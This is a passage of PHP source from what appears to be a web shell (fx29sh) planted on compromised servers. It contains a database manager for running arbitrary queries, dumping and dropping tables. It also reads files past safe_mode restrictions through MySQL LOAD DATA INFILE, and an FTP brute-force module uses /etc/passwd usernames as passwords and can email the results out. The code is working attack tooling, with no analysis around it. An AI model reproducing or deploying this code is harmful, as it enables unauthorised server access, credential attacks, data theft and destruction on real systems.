684 elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
685 elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
686 elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
687 elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
688 elseif ($sql_tbl_act == "insert") {
689 if ($sql_tbl_insert_radio == 1) {
690 $keys = "";
691 $akeys = array_keys($sql_tbl_insert);
692 foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
693 if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
694 $values = "";
695 $i = 0;
696 foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
697 if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
698 $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
699 $sql_act = "query";
700 $sql_tbl_act = "browse";
701 }
702 elseif ($sql_tbl_insert_radio == 2) {
703 $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
704 $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
705 $result = mysql_query($sql_query) or print(mysql_smarterror());
706 $result = mysql_fetch_array($result, MYSQL_ASSOC);
707 $sql_act = "query";
708 $sql_tbl_act = "browse";
709 }
710 }
711 if ($sql_act == "query") {
712 echo "<hr size=\"1\" noshade>";
713 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
714 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
715 if ((!$submit) or ($sql_act)) { echo "<table><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>"; }
716 }
717 if (in_array($sql_act,$acts)) {
718 ?>
719 <table>
720 <tr>
721 <td>
722 <b>Create new table:</b>
723 <form action="<?php echo $surl; ?>">
724 <input type="hidden" name="act" value="sql">
725 <input type="hidden" name="sql_act" value="newtbl">
726 <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
727 <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
728 <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
729 <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
730 <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
731 <input type="text" name="sql_newtbl" size="20">
732 Fields: <input type="text" name="sql_field" size="3">
733 <input type="submit" value="Create">
734 </form>
735 </td>
736 <td><b>Dump DB:</b>
737 <form action="<?php echo $surl; ?>">
738 <input type="hidden" name="act" value="sql">
739 <input type="hidden" name="sql_act" value="dump">
740 <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
741 <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
742 <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
743 <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
744 <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
745 <input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">
746 <input type="submit" name="submit" value="Dump">
747 </form>
748 </td>
749 </tr>
750 </table>
751<?php
752 if (!empty($sql_act)) { echo "<hr size=\"1\" noshade>"; }
753 if ($sql_act == "newtbl") {
754 echo "<b>";
755 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
756 echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
757 }
758 else { echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror(); }
759 }
760 elseif ($sql_act == "dump") {
761 if (empty($submit)) {
762 $diplay = FALSE;
763 echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
764 echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
765 $v = join (";",$dmptbls);
766 echo "<b>Only tables (explode \";\") <b><sup>1</sup></b>:</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
767 if ($dump_file) {$tmp = $dump_file;}
768 else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
769 echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
770 echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
771 echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
772 echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
773 echo "</form>";
774 }
775 else {
776 $diplay = TRUE;
777 $set = array();
778 $set["sock"] = $sql_sock;
779 $set["db"] = $sql_db;
780 $dump_out = "download";
781 $set["print"] = 0;
782 $set["nl2br"] = 0;
783 $set[""] = 0;
784 $set["file"] = $dump_file;
785 $set["add_drop"] = TRUE;
786 $set["onlytabs"] = array();
787 if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
788 $ret = mysql_dump($set);
789 if ($sql_dump_download) {
790 @ob_clean();
791 header("Content-type: application/octet-stream");
792 header("Content-length: ".strlen($ret));
793 header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
794 echo $ret;
795 exit;
796 }
797 elseif ($sql_dump_savetofile) {
798 $fp = fopen($sql_dump_file,"w");
799 if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
800 else {
801 fwrite($fp,$ret);
802 fclose($fp);
803 echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
804 }
805 }
806 else {echo "<b>Dump: nothing to do!</b>";}
807 }
808 }
809 if ($diplay) {
810 if (!empty($sql_tbl)) {
811 if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
812 $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
813 $count_row = mysql_fetch_array($count);
814 mysql_free_result($count);
815 $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
816 $tbl_struct_fields = array();
817 while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
818 if (@$sql_ls > @$sql_le) { $sql_le = $sql_ls + $perpage; }
819 if (empty($sql_tbl_page)) { $sql_tbl_page = 0; }
820 if (empty($sql_tbl_ls)) { $sql_tbl_ls = 0; }
821 if (empty($sql_tbl_le)) { $sql_tbl_le = 30; }
822 $perpage = $sql_tbl_le - $sql_tbl_ls;
823 if (!is_numeric($perpage)) { $perpage = 10; }
824 $numpages = $count_row[0]/$perpage;
825 $e = explode(" ",$sql_order);
826 if (count($e) == 2) {
827 if ($e[0] == "d") { $asc_desc = "DESC"; }
828 else { $asc_desc = "ASC"; }
829 $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
830 }
831 else {$v = "";}
832 $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
833 $result = mysql_query($query) or print(mysql_smarterror());
834 echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
835 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[<b> Structure </b>]</a> ";
836 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[<b> Browse </b>]</a> ";
837 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[<b> Dump </b>]</a> ";
838 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[ <b>Insert</b> ]</a> ";
839 if ($sql_tbl_act == "structure") { echo "<b>Under construction!</b>"; }
840 if ($sql_tbl_act == "insert") {
841 if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
842 if (!empty($sql_tbl_insert_radio)) { echo "<b>Under construction!</b>"; }
843 else {
844 echo "<br><br><b>Inserting row into table:</b><br>";
845 if (!empty($sql_tbl_insert_q)) {
846 $sql_query = "SELECT * FROM `".$sql_tbl."`";
847 $sql_query .= " WHERE".$sql_tbl_insert_q;
848 $sql_query .= " LIMIT 1;";
849 $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
850 $values = mysql_fetch_assoc($result);
851 mysql_free_result($result);
852 }
853 else {$values = array();}
854 echo "<form method=\"POST\"><table width=\"1%\"><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
855 foreach ($tbl_struct_fields as $field) {
856 $name = $field["Field"];
857 if (empty($sql_tbl_insert_q)) {$v = "";}
858 echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
859 $i++;
860 }
861 echo "</table><br>";
862 echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
863 if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
864 echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
865 }
866 }
867 if ($sql_tbl_act == "browse") {
868 $sql_tbl_ls = abs($sql_tbl_ls);
869 $sql_tbl_le = abs($sql_tbl_le);
870 echo "<hr size=\"1\" noshade>";
871 echo "<img src=\"".$surl."act=img&img=multipage\" alt=\"Pages\"> ";
872 $b = 0;
873 for($i=0;$i<$numpages;$i++) {
874 if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
875 echo $i;
876 if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
877 if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
878 else { echo " "; }
879 }
880 if ($i == 0) {echo "empty";}
881 echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\"> <input type=\"submit\" value=\"View\"></form>";
882 echo "<br><form method=\"POST\">\n";
883 echo "<table><tr>";
884 echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
885 for ($i=0;$i<mysql_num_fields($result);$i++) {
886 $v = mysql_field_name($result,$i);
887 if ($e[0] == "a") {$s = "d"; $m = "asc";}
888 else {$s = "a"; $m = "desc";}
889 echo "<td>";
890 if (empty($e[0])) {$e[0] = "a";}
891 if (@$e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
892 else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" alt=\"".$m."\"></a>";}
893 echo "</td>";
894 }
895 echo "<td><font color=\"green\"><b>Action</b></font></td>";
896 echo "</tr>";
897 while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
898 echo "<tr>";
899 $w = "";
900 $i = 0;
901 foreach ($row as $k=>$v) {
902 $name = mysql_field_name($result,$i);
903 $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;
904 }
905 if (count($row) > 0) { $w = substr($w,0,strlen($w)-3); }
906 echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
907 $i = 0;
908 foreach ($row as $k=>$v) {
909 $v = htmlspecialchars($v);
910 if ($v == "") { $v = "<font color=\"green\">NULL</font>"; }
911 echo "<td>".$v."</td>";
912 $i++;
913 }
914 echo "<td>";
915 echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">Delete</a> ";
916 echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\">Edit</a> ";
917 echo "</td>";
918 echo "</tr>";
919 }
920 mysql_free_result($result);
921 echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" alt=\" ^ \"><select name=\"sql_act\">";
922 echo "<option value=\"\">With selected:</option>";
923 echo "<option value=\"deleterow\">Delete</option>";
924 echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>";
925 }
926 }
927 else {
928 $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
929 if (!$result) { echo mysql_smarterror(); }
930 else {
931?>
932 <form method="POST">
933 <table>
934 <tr><th><input type="checkbox" name="boxtbl_all" value="1"></th><th>Table</th><th>Rows</th><th>Engine</th><th>Created</th><th>Modified</th><th>Size</th><th>Action</th></tr>
935<?php
936 $i = 0;
937 $tsize = $trows = 0;
938 while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
939 $tsize += $row["Data_length"];
940 $trows += $row["Rows"];
941 $size = view_size($row["Data_length"]);
942?>
943 <tr>
944 <td><input type="checkbox" name="boxtbl[]" value="<?php echo $row["Name"]; ?>"></td>
945 <td><a href="<?php echo $sql_surl; ?>sql_tbl=<?php echo urlencode($row["Name"]); ?>"><b><?php echo $row["Name"]; ?></b></a></td>
946 <td><?php echo $row["Rows"]; ?></td><td><?php echo $row["Engine"]; ?></td><td><?php echo $row["Create_time"]; ?></td><td><?php echo $row["Update_time"]; ?></td><td><?php echo $size; ?></td>
947 <td><a href="<?php echo $sql_surl; ?>sql_act=query&sql_query=<?php echo urlencode("DELETE FROM `".$row["Name"]."`"); ?>">Empty</a> <a href="<?php echo $sql_surl; ?>sql_act=query&sql_query=<?php echo urlencode("DROP TABLE `".$row["Name"]."`"); ?>">Drop</a> <a href="<?php echo $sql_surl; ?>sql_tbl_act=insert&sql_tbl=<?php echo $row["Name"]; ?>">Insert</a></td>
948 </tr>
949<?php
950 $i++;
951 }
952 echo "\t\t<tr>\n".
953 "\t\t<th>+</th><th>$i table(s)</th><th>$trows</th><th>$row[1]</th><th>$row[10]</th><th>$row[11]</th><th>".view_size($tsize)."</th><th></th>\n";
954?>
955 </tr>
956 </table>
957 <div align="right">
958 <select name="sql_act">
959 <option value="">With selected:</option>
960 <option value="tbldrop">Drop</option>
961 <option value="tblempty">Empty</option>";
962 <option value="tbldump">Dump</option>";
963 <option value="tblcheck">Check table</option>";
964 <option value="tbloptimize">Optimize table</option>";
965 <option value="tblrepair">Repair table</option>";
966 <option value="tblanalyze">Analyze table</option>";
967 </select>
968 <input type="submit" value="Confirm">
969 </div>
970 </form>
971<?php
972 mysql_free_result($result);
973 }
974 }
975 }
976 }
977 }
978 else {
979 $acts = array("","newdb","serverstatus","servervars","processes","getfile");
980 if (in_array($sql_act,$acts)) {
981?>
982 <table>
983 <tr>
984 <td><b>Create new DB:</b>
985 <form action="<?php echo $surl; ?>">
986 <input type="hidden" name="act" value="sql">
987 <input type="hidden" name="sql_act" value="newdb">
988 <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
989 <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
990 <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
991 <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
992 <input type="text" name="sql_newdb" size="20">
993 <input type="submit" value="Create">
994 </form>
995 </td>
996 <td><b>View File:</b>
997 <form action="<?php echo $surl; ?>">
998 <input type="hidden" name="act" value="sql">
999 <input type="hidden" name="sql_act" value="getfile">
1000 <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
1001 <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
1002 <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
1003 <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
1004 <input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">
1005 <input type="submit" value="Get">
1006 </form>
1007 </td>
1008 </tr>
1009 </table>
1010<?php
1011 }
1012
1013 ##[ SQL ACTIONS ]##
1014 if (!empty($sql_act)) {
1015 echo "<hr size=\"1\" noshade>";
1016 if ($sql_act == "newdb") {
1017 echo "<b>";
1018 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
1019 else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
1020 }
1021 if ($sql_act == "serverstatus") {
1022 $result = mysql_query("SHOW STATUS", $sql_sock);
1023 echo "<center><b>Server-status variables:</b><br><br>";
1024 echo "<table><td><b>Name</b></td><td><b>Value</b></td></tr>";
1025 while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1026 echo "</table></center>";
1027 mysql_free_result($result);
1028 }
1029 if ($sql_act == "servervars") {
1030 $result = mysql_query("SHOW VARIABLES", $sql_sock);
1031 echo "<center><b>Server variables:</b><br><br>";
1032 echo "<table><td><b>Name</b></td><td><b>Value</b></td></tr>";
1033 while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1034 echo "</table>";
1035 mysql_free_result($result);
1036 }
1037 if ($sql_act == "processes") {
1038 if (!empty($kill)) {
1039 $query = "KILL ".$kill.";";
1040 $result = mysql_query($query, $sql_sock);
1041 echo "<b>Process #".$kill." was killed.</b>";
1042 }
1043 $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
1044 echo "<center><b>Processes:</b><br><br>";
1045 echo "<table><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
1046 while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
1047 echo "</table>";
1048 mysql_free_result($result);
1049 }
1050 if ($sql_act == "getfile") {
1051 $tmpdb = $sql_login."_tmpdb";
1052 $select = mysql_select_db($tmpdb);
1053 if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
1054 if ($select) {
1055 $created = FALSE;
1056 mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
1057 mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
1058 $result = mysql_query("SELECT * FROM tmp_file;");
1059 if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
1060 else {
1061 for ($i=0;$i<mysql_num_fields($result);$i++) { $name = mysql_field_name($result,$i); }
1062 $f = "";
1063 while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $f .= join ("\r\n",$row); }
1064 if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
1065 else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
1066 mysql_free_result($result);
1067 mysql_query("DROP TABLE tmp_file;");
1068 }
1069 }
1070 mysql_drop_db($tmpdb);
1071 }
1072 }
1073 }
1074 }
1075?>
1076 </td>
1077 </tr>
1078<?php
1079 if ($sql_sock) {
1080 $affected = @mysql_affected_rows($sql_sock);
1081 if ((!is_numeric($affected)) or ($affected < 0)) { $affected = 0; }
1082 echo "\t<tr><th colspan=2>Affected rows: $affected</th></tr>";
1083 }
1084?>
1085
1086</table>
1087<!-- End of SQL Manager -->
1088
1089<?php
1090 }
1091 if ($act == "ftpquickbrute") {
1092 echo "<table>\n";
1093 echo "<tr><td class=\"barheader\" colspan=2>.: Ftp Quick Brute :.</td></tr>";
1094 echo "<tr><td>";
1095 if (!empty($submit)) {
1096 if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
1097 $fp = fopen("/etc/passwd","r");
1098 if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
1099 else {
1100 if ($fqb_logging) {
1101 if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
1102 else {$fqb_logfp = FALSE;}
1103 $fqb_log = "FTP Quick Brute (".sh_name().") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
1104 if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1105 }
1106 @ob_flush();
1107 $i = $success = 0;
1108 $ftpquick_st = getmicrotime();
1109 while(!feof($fp)) {
1110 $str = explode(":",fgets($fp,2048));
1111 if (fx29ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) {
1112 echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
1113 $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
1114 if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1115 $success++;
1116 ob_flush();
1117 }
1118 if ($i > $fqb_lenght) {break;}
1119 $i++;
1120 }
1121 if ($success == 0) { echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n"; }
1122 $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
1123 echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font class=on><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
1124 $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
1125 if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1126 if ($fqb_logemail) {@mail($fqb_logemail,"".sh_name()." report",$fqb_log);}
1127 fclose($fqb_logfp);
1128 }
1129 }
1130 else {
1131 $logfile = $tmp_dir."fx29sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
1132 $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
1133 echo "<form name=\"f_ftpqb\" action=\"".$surl."\">\n".
1134 "<input type=hidden name=act value=\"ftpquickbrute\">\n".
1135 "Read first:</td><td><input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"></td></tr>".
1136 "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"> Users only with shell</td></tr>".
1137 "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked>Logging</td></tr>".
1138 "<tr><td>Logging to file:</td><td><input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"></td></tr>".
1139 "<tr><td>Logging to e-mail:</td><td><input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"></td></tr>".
1140 "<tr><td colspan=2><input type=submit name=submit value=\"Brute\"></form>";
1141 }
1142 echo "</td></tr></table></center>";
1143 }
1144 ##[ SECURITY ]##
1145 if ($act == "security") {
1146?>
1147<div class=barheader>.: Server Security Information :.</div>
1148
1149<table class="contents">
1150 <tr><td>Open Base Dir</td><td><?php echo $hopenbasedir; ?></td></tr>
1151 <td>Password File</td><td>
1152<?php
1153 if (!is_windows()) {
1154 if ($nixpasswd) {
1155 if ($nixpasswd == 1) { $nixpasswd = 0; }
1156 if (!is_numeric($nixpwd_s)) { $nixpwd_s = 0; }
1157 if (!is_numeric($nixpwd_e)) { $nixpwd_e = $nixpwdperpage; }
1158?>
1159 *nix /etc/passwd:<br>
1160 <form name="f_pwd" action="<?php echo $surl; ?>">
1161 <input type="hidden" name="act" value="security">
1162 <input type="hidden" name="nixpasswd" value="1">
1163 <b>From:</b>
1164 <input type="text" name="nixpwd_s" value="<?php echo $nixpwd_s; ?>">
1165 <b>To:</b>
1166 <input type="text" name="nixpwd_e" value="<?php $nixpwd_e; ?>">
